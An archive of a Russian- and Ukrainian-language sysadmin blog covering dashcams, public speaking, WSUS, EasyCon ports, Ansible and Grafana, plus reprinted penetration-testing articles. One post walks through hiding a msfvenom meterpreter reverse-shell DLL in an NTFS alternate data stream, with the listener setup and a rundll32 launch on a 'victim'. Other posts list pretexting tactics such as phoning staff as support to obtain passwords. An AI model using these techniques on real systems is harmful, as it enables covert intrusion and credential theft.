Главная

Saturday, 29 May 2021

Датчики видеорегистратора Aspiring Proof 3.


Всем привет.

На днях в мои руки попал видеорегистратор Aspiring Proof 3. Покупали его по акции, ибо за ту цену что просят за него обычно я бы на этот бюджетник даже не взглянул. Поэтому взяли его на пробу. Критиковать такой минимализм, наверное, грешно, но я рискну).

Итак, видеорегистратор заявленные функции выполняет. Но я бы хотел остановиться на его датчиках.

Детектор движения.

При включении этой функции, устройство будет находиться в «режиме ожидания». В случае, если перед вашим автомобилем будет зафиксировано движение, устройство автоматически включается и начинает запись. Эта функция позволяет лучше защитить ваш автомобиль, когда вы не находитесь внутри. Однако в этом случае видеорегистратор считает движением абсолютно все, даже когда вы нему прикасаетесь. Т.е. взять его и после перенастроить параметры для вас будет уже проблематично - он все время норовит фиксировать происходящее!

Акселерометр (он же датчик перегрузок, датчик гравитации или G-sensor).

Акселерометр это устройство, фиксирующее возникновения резких сотрясений в результате, например, ДТП, и немедленно блокирует текущее видео от перезаписи. Такие заблокированы видео могут служить доказательствами в случае аварии и могут быть удалены только вручную. При неудачно выбранном пороге G на карте устройства может поселиться большое количество видео-файлов защищенных от записи что приведет к отказу записи новых.
 

Thursday, 27 May 2021

Почни говорити зараз!

Всім привіт.

Сьогодні наведу вам поради від команди Prometheus щодо публічних виступів.  Зважте на те що ваш виступ може бути не обов'язково з трибуни, то ж на мою думку такі поради будуть корисні кожному.

Якщо ви виступаєте перед аудиторією, як правило, є причина. Знайте, з ким ви розмовляєте та що саме потрібно дізнатися цим людям з вашого виступу. Ваша промова має бути корисною для тих, хто її слухає.

Якщо ваша мета - стати лідером думок або насправді навчити аудиторію чогось, лише автентичне розуміння матеріалу допоможе її досягти.

Тема вашого виступу не має значення - місце емоціям та гумору є завжди. Публіка може не пам’ятати всього, що ви сказали, але вона пам’ятатиме, як ви змусили її відчувати себе. Але не перебільшуйте, ні в якому разі не переходьте на сатиру. Гумор тонке почуття - не всі його мають, і так само не всі його розуміють.

Єдиний спосіб щось покращити - робити це весь час. Репетиція - це добре, але реальний виступ перед аудиторією - це вкрай важлива практика!

Різні події часто вимагають різного підходу чи стилю. Іноді читання підготовленої промови - це нормально. Деякі використовують нотатки чи тези. Інші намагаються виступати взагалі без додаткової допомоги. Підберіть свій стиль виступів. Не перестарайтесь із залученням презентацій. Їх також слід вміти робити, не опускайтеся до звичайного перелистування сторінок документа на широкому екрані.

Пам’ятайте - спілкування набагато більше стосується мови тіла, ніж слів, які ми говоримо. Слова, звичайно, важливі, але наголос робиться саме рухом та мовою тіла. Не забувайте де ви це робите: рухаєтесь по залі, стоїте за трибуною, або взагалі сидячи в президії. Все це має сенс, або не має, відповідно до формату доповіді.

Ніщо не показує вашого переживання більше, ніж надто швидка презентація. Якщо ви хочете вплинути на аудиторію, переконайтеся, що вона насправді чує те, що ви говорите. 

Цей пункт дуже важливий. Встановіть зоровий контакт з якомога більшою кількістю людей. Це викликає відчуття, ніби ви говорите безпосередньо з кожним учасником.

І робіть їх довшими, ніж ви навіть вважаєте доречним. Це може мати великий вплив на підкреслення ключових моментів та емоційний стан аудиторії.

Відчуваєте себе оратором? Готові до виступу? Ви маєете чудову нагоду зареєструватися на курс ораторської майстерності «Почни говорити зараз», який пройшли команди EPAM, G5 Entertainment, Global Logic, Sigma, SoftServe, EdCamp Ukraine. 

Чим ви гірші?:)

Wednesday, 26 May 2021

Авторестарт web-пула WSUS.

Всем привет.

Может пригодился вам  тот скрипт, а может и нет, но вот установку для авторестарта web-пула WSUS надо обязательно сделать. 

Писать долго не буду, все очевидно: указываем в настройках IIS порог испольуемого ОЗУ в килобайтах после которого web-пул WSUS будет перегружен. 


Это так. Успехов.



Monday, 17 May 2021

Про социальную инженерию.

Всем привет.

Чтобы не утонуть в цифровых технологиях надо себя отвлекать на более "простые" вещи в жизни. Если это возможно). Утверждают что общение на интересные темы с другими людьми для этого подходит как никогда. Тем более что социальные сети и форумы предоставляют такую возможность где угодно. Однако в этом случае вы можете много времени потратить на поиск адекватного собеседника и даже устать от некоторых из них. Поэтому перед тем как нырять в пучину чужих мнений я бы рекомендовал кое-что почитать на тему социальной инженерии. Эта наука именно для тех кто желает общаться на любые темы, но особо пока не углубляясь ни в одну из них. Не стоит полагать что все кругом только и думают как вас обмануть. Нет, но выявлять (не)произвольные признаки манипуляций, лукавства или нечестной игры в сети или наяву определенно стоит. С прицелом на будущее.

В этом плане первой я бы рекомендовал книгу специалиста по социальной инженерии К.Хеднеги, "Искусство обмана", 2020. Ниже я приведу выдержки из этой увлекательной книги.

Лучшие техники автора для быстрого установления контакта с кем угодно:

• искусственные временные ограничения;

• невербалика;

• снижение темпа речи;

• сочувствие или помощь;

• усмирение эго;

• валидация;

• вопросы «как», «почему» и «когда»;

• взаимовыгодный обмен;

• равноценный альтруизм;

• управление ожиданиями.

Saturday, 15 May 2021

Особенность работы EasyCon.


Всем привет.

С пылу жару. В требованиях для нормальной работы системы EasyCon заключается в использовании web-браузера Chrome или Firefox и открытых портов:

tcp: 80, 443, 8443, 8444, 8958

tcp-udp: 3478, 5349

udp: 31001-65535.

Но еще одной особенностью работы EasyCon в корпоративных сетях заключается в том что EasyCon работает по принципу P2P (peer-to-peer). Конечными точками в этом случае будут ваш IP адрес и IP-адреса других участников конференции, которые могут быть динамическими (меняться время от времени). То есть, центральный сервер, через который идет трафик, отсутствует. Соответственно, вы открываете вышеуказанные порты для forward (проходного) трафика в локальных компьютеров или сегмента вашей сети и от них в обратную сторону. На рисунке Peer-1 это ваша сеть, а Peer-2 - какой угодно клиент (организатор) с вами в конференции. Сервер EasyCon - синий круг. Как видите, udp пакеты будут направлены непосредственно между Peer-1 и Peer-2. Их может быть 2 и более.


И тут нам надо вcпомнить что мы ранее защищались  с помощью плагина WebRTC Control. Вот его в этом случае придется отключить для Chrome.

Успехов.

Friday, 14 May 2021

Монитор стабильности системы.

Всем привет.

Когда с вашей Windows начинают происходить необъяснимые вещи, один из самых полезных (но скрытных) инструментов, для того чтобы выяснить, в чем же дело - монитор стабильности системы, спрятанный в виде ссылки внутри Центра поддержки Windows. 

Монитор стабильности системы ведет учет изменений и сбоев на компьютере и предоставляет этот обзор в удобном графическом виде - дает возможность увидеть, какое приложение и когда вызвало ошибку или зависло, отследить появление синего экрана смерти Windows, а также увидеть, связано ли это с очередным обновлением Windows или установкой очередной программы - учет этих событий также ведется. Иначе говоря, инструмент этот очень полезен и может пригодиться любому - как начинающему, так и опытному пользователю. 

Найти монитор стабильности можно во всех последних версиях Windows. А можно и не найти).  Например у меня по окошкам и по поиску он упорно не хотел проявляться. Поэтому я нашел более быстрый способ запуска из командной строки как "perfmon /rel". Готово!



Монитор стабильности стал востребован и получил некую надстройку в виде утилиты Reliability Viewer for Windows, которая может показать данные по надежности системы Windows как локальной, так и на удаленном ПК. Утилита выводит в удобном виде ключевые системные события о сбое приложений, установке программного обеспечения и обновлений, MsiInstaller, неожиданных отключениях системы, синих экранах смерти, установке драйверов, аппаратном сбое. Для отображения данных в программе Reliability Viewer for Windows в выпадающих полях можно выбрать нужный пункт либо оставить параметр «*» по умолчанию, который соответствует видимости полной информации.


Эта надстройка написана на Powershell, бесплатна, и не имеет инсталятора. Поэтому для ее корректной работы надо предварительно весь код скопировать в "C:\Program Files\SMSAgent\Reliability Viewer for Windows\".

Успехов.

Thursday, 13 May 2021

Проводим пентест, часть 3 - ищем уязвимости.

Всем привет.

Сегодня третья часть из серии публикаций Андрея Бирюкова, посвященных проведению аудита и теста на проникновение(пентест). Оригинал статьи был опубликован в журнале "Системный администратор" №06(163), июнь 2016.

Часть 3. Ищем уязвимости.

После успешного сбора информации о сети жертвы необходимо попытаться проникнуть на интересующие нас узлы. В этой статье речь пойдет о том, как искать уязвимости для проникновения

В  предыдущих  двух  статьях  цикла  [1, 2]  мы  собирали  информацию об атакуемой сети и пытались проникнуть внутрь посредством беспроводных каналов связи. Будем считать, что  находимся  в  атакуемой  сети,  нам  известны  подсети, адресация, маски, шлюзы, активные узлы и прочая полезная информация. Мы уже знаем, какие операционные системы и версии прошивок используются. Можем приступить к взлому.

Я не случайно уделил столько внимания вопросам исследования сети. Дело в том, что при отсутствии этой информации,  взлом  превращается  в  блуждание  с  завязанными глазами.  На  то,  чтобы  провести  это  исследование,  злоумышленнику нужны время и некоторые активные действия, по которым его можно обнаружить еще до того, как он начал наносить ущерб компании. Итак, мы знаем, какой хост является каким устройством. Теперь  попробуем  проникнуть  на  некоторые  из  них.  Пока не будем искать и использовать уязвимости в программном обеспечении. Вместо этого внимательно посмотрим на собранную нашими сканерами и снифферами в предыдущей статье  информацию  об  имеющихся  в  сети  устройствах и программном обеспечении, используемом на них. С  отчетами  сканеров  все  понятно,  для  обнаруженных хостов нам сообщили то, что удалось определить. Что касается снифферов, то тут, даже если нам не удалось перехватить пароли пользователей, в перехваченном трафике наверняка есть приветственные сообщения (баннеры) различных устройств и приложений. Так или иначе, нелишним будет проверить содержимое cap-файла с перехваченным  трафиком  на  наличие  наименований  наиболее распространенного ПО и оборудования.

В рамках статьи будем считать, что перехватить какие-либо учетные данные сниффером не удалось, и будем добывать доступ к узлам самостоятельно. А к теме перехваченных паролей вернемся, когда будем обсуждать поднятие привилегий (privilege escalation), в одной из следующих статей.

Итак, у нас есть некий список идентифицированного ПО. 

Алгоритм наших дальнейших действий в рамках данной статьи будет следующим:

  • Поиск учетных записей по умолчанию (если применимо).
  • Проверка данных аккаунтов.
  • Сканирование на наличие уязвимостей.
  • Эксплуатация данных уязвимостей и получение доступа.

Поиск учетных записей по умолчанию.

Начнем  с  самого  простого,  а  именно  попробуем  подключиться к узлам в сети жертвы с помощью учетных записей по умолчанию. В  данном  контексте  учетными  записями  по  умолчанию мы будем называть технологические аккаунты, которые создаются при первичной инициализации устройства или ПО. Такие записи особенно актуальны для различного сетевого оборудования, прежде всего точек доступа к беспроводным сетям. Конечно,  все  вендоры  настоятельно  рекомендуют  менять пароли после инициализации. Но мой опыт показывает, что особенно в сетях крупных организаций это правило совершенно  не  выполняется.  Произведя  первоначальную установку с паролями по умолчанию, администраторы потом просто забывают про свои устройства и вспоминают о них только в случаях сбоев. При этом сисадмины, как будет описано далее, судорожно ищут эти заводские пароли в документации вендоров. Для  того  чтобы  узнать  учетные  записи  по  умолчанию, прежде всего необходимо обратить к руководству по установке, которое можно найти на сайте разработчика данного устройства. Так как модель устройства нам известна, поиск документации  не  должен  составить  большого  труда.  Зачастую,  чтобы  найти  нужное,  достаточно  воспользоваться Google. Но когда в сети жертвы имеется целый «зоопарк» устройств, ускорить процесс поиска учетных записей по умолчанию можно с помощью ресурсов, подобных [3]. А что делать, если в сети несколько десятков различных сетевых устройств? Процесс подключения к каждому из них для проверки правильности учеток по умолчанию может занять продолжительное время. Кроме того, такая активность может быть обнаружена системами мониторинга.

Tuesday, 11 May 2021

Варианты имплементации file streaming.

Всем привет.

Как известно, хакеры могут скрывать свои инструментальные средства (файлы) на томах NTFS через механизм, известный как "потоковая" передача файлов (file streaming).  Когда инструментальные средства скрытые таким образом, то файлы в которых они спрятаны, не изменяются в размерах. 

Выполним имплементацию файла putty.exe в файл document.txt: 

type putty.exe > document.txt:test.exe

Однако спрятать просто файл это пол дела, хорошо бы еще ему сделать запуск на комьютере жертвы. Например так - запуск putty.exe из файла document.txt с помощью WMI: 

wmic process call create document.txt:test.exe

Но putty.exe есть putty.exe, вполне себе безобидная утилита.

А давайте рассмотрим вариант как же создать троян svchost.dll и имплементировать его в document.txt в Kali Linux. 

Выполняем в Kali Linux (192.168.1.10):

- создаем троян

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=5000 -f dll -o /var/www/html/svchost.dll

- запускаем слушатель 

msf exploit(multi/handler) > resource /root/Desktop/meta_script/listener.rc

resource>use exploit/multi/handler

resource>set payload windows/meterpreter/reverse_tcp

resource>set lhost 192.168.1.10

resource>set lport 5000

resource>run

...

Выполняем на жертве имплементацию:

typeс > document.txt:svchost.dll

Выполняем запуск svchost.dll из файла document.txt с помощью Rundll32: 

rundll32.exe document.txt:svchost.dll,DllMain

...

- и мы в системе (Kali Linux):

meterpreter> теперь можем танцевать по жертве.

Thursday, 6 May 2021

Ansible-роль для Linux.

Всем привет.

После установки свежей Linux ей надо указать IP-адрес, временную зону, адрес DNS-сервера, адрес Proxy-сервера, локализацию консоли, прочее. И только после этого уже можно переходить к обновлению системы и установке прочего софта.

Эти шаги настолько обязательны что хочется их автоматизировать, чтобы исключить человеческий фактор. А почему бы и нет? Мои мысли прочитал Вячеслав Лохтуров и предложил для этого иcпользовать Ansible.

Он набросал Ansible-роль под именем "host". Роль использует следующие переменные назначение которых очевидно:

hostname: Linux-host

base_domain_prefix: mydomain

base_domain_suffix: net

base_net: 192.168.1

gateway_octet: 254

dns_ip: 192.168.1.1

proxy_ip: 192.168.1.1

proxy_port: 8080

А в список задач для исполнения включено следующее:

# /host/tasks/main.yml

- name: Create hosts file
  template: src=hosts.j2 dest=/etc/hosts
- name: Create resolv.conf file
  template: src=resolv.conf.j2 dest=/etc/resolv.conf
- name: Create hostname file
  template: src=hostname.j2 dest=/etc/hostname
- name: Create environment file
  template: src=environment.j2 dest=/etc/environment
- name: Create interfaces file CentOS
  template: src=interfacesC.j2 dest=/etc/network/interfaces
  when: ansible_distribution == 'CentOS' or ansible_distribution == 'Red Hat Enterprise Linux'
- name: Create interfaces file Ubuntu
  template: src=interfacesU.j2 dest=/etc/network/interfaces
  when: ansible_distribution == 'Debian' or ansible_distribution == 'Ubuntu'
- name: Update system locale CentOS
  timedatectl set-timezone Europe/Kyiv
  localectl set-locale LANG=ru_RU.utf8
  when: ansible_distribution == 'CentOS' or ansible_distribution == 'Red Hat Enterprise Linux'
- name: Update system locale Ubuntu
  timedatectl set-timezone Europe/Kiev
  echo LANG=ru_RU.UTF-8 > /etc/default/locale
  when: ansible_distribution == 'Debian' or ansible_distribution == 'Ubuntu'

Все задачи также очевидны по своему назначению, кроме, разве что, изменения hostname хоста. Я бы ее не применял. Все файлы роли после моих правок я выложил одним архивом: пользуйтесь, критикуйте, меняйте под себя.

Успехов.

Sunday, 2 May 2021

Параметры уведомлений в Grafana.

Всем привет.

Оказалось что для задействования уведомлений (Alerts) в паре Zabbix плюс Grafana надо было обновить  Zabbix plugin до версии не ниже 4.0.0.  Обновил, и теперь можно спокойно заняться настройкой параметров уведомлений в самой Grafana.

Итак, чтобы настроить правила для отправки нам уведомлений нужно:

1. Нажмите на заголовок графика и выбирете "Edit".

2. Нажмите "Create alert".


3. Внесите параметры уведомления:

a) Name - произвольное имя уведомления.

b) Evaluate every - частота уведомления. Например, 5m для уведомления каждые пять минут или 1h для уведомления каждый час.

c) For - время, которое Grafana выжидает после наступления порогового значения параметра. Например, 15m для ожидания 15 минут.

d) Conditions - условия для уведомления:

Saturday, 1 May 2021

Проводим пентест, часть 2 - сбор необходимой информации.

Всем привет.

Сегодня вторая часть из серии публикаций Андрея Бирюкова, посвященных проведению аудита и теста на проникновение(пентест). Оригинал статьи был опубликован в журнале "Системный администратор" №05(162), май 2016.

Часть 2. Сбор необходимой информации.

Правильная идентификация версий ОС и ПО является неотъемлемой частью успешной атаки. В статье мы поговорим о том, как это можно сделать В предыдущей статье [1] мы провели аудит доступа к беспроводной сети. Теперь будем считать, что злоумышленник уже проник в корпоративную сеть и ему нужно собрать необходимую для взлома информацию. Для этого понадобится правильно идентифицировать установленные в сети приложения и перехватить как можно больше сетевого трафика, из его содержимого узнать о том, какие протоколы используются, и постараться перехватить учетные данные пользователей.

Разнообразие  приложений,  протоколов,  ОС  и  прошивок к  оборудованию  ставит  перед  потенциальным  взломщиком задачу  по  точной  идентификации  как  самой  программы, так и ее версии, архитектуры и других важных для атаки параметров. Ведь не бывает универсальных эксплоитов, каждый из них рассчитан на уязвимости в определенных условиях.

Не забываем о людях.

Собирать информацию о целевых сервисах можно не только техническими средствами, но и с помощью социальной инженерии.  Основные  способы  сбора  информации  (подробнее в [2]):

  • Анализ оборудования и ПО, упоминающихся в вакансиях организации.
  • Получение  данных  посредством  общения  с  техническими специалистами организации.
  • Сбор сведений о закупаемом оборудовании и ПО из открытых источников (например, goszakupki.ru или prozorro.gov.ua).
  • Анализ информации, которую размещают сотрудники компании, и особенно технические специалисты, в социальных сетях.
  • Телефонные звонки сотрудникам от имени технического персонала.


Первый метод позволит злоумышленнику получить базовое представление о тех сервисах, которые могут использоваться в компании. Само по себе это даст мало полезной информации, поэтому на следующем шаге хакер под видом соискателя может попытаться пройти собеседование и получить более детальные данные по оборудованию и ПО.

Государственные  организации  обязаны  все  свои  заказы размещать в открытом доступе, поэтому ресурсы типа goszakupki.ru  являются  дополнительным  источником  информации. Например, среди заказов можно встретить лоты на продление лицензий на ПО. К лотам должно быть прикреплено техническое задание или аналогичный документ, из которого тоже можно почерпнуть массу полезной информации.

Серьезной  проблемой  для  информационной  безопасности могут стать социальные сети. Конечно, никто не будет размещать пароли или другую конфиденциальную информацию на своей странице. А вот телефонный номер, ICQ, личную почту очень даже может. Ну и само собой фотография лишней не будет.

Ну а дальше социальная инженерия во всей красе. С помощью  полученной  контактной  информации  злоумышленник может связаться с сотрудниками компании и получить необходимую информацию. Обратите внимание, все приведенные выше действия вряд ли можно хоть как-то подвести под статьи уголовного кодекса.

В качестве практической части ко всему вышесказанному можно попытаться собрать информацию о технических специалистах своей компании в социальных сетях. Посмотреть, какая информация о корпоративной сети есть в открытом доступе. Не лишним будет кому-либо из специалистов,  проводящих  аудит,  позвонить  сотрудникам  компании и  от  имени,  например,  техподдержки  попытаться  узнать пароль выхода в корпоративную сеть. Подобные эксперименты позволяют получить представление об общем уровне осведомленности об ИБ в компании.

На этом, я думаю, с социальной инженерией можно закончить и перейти к техническим способам сбора информации.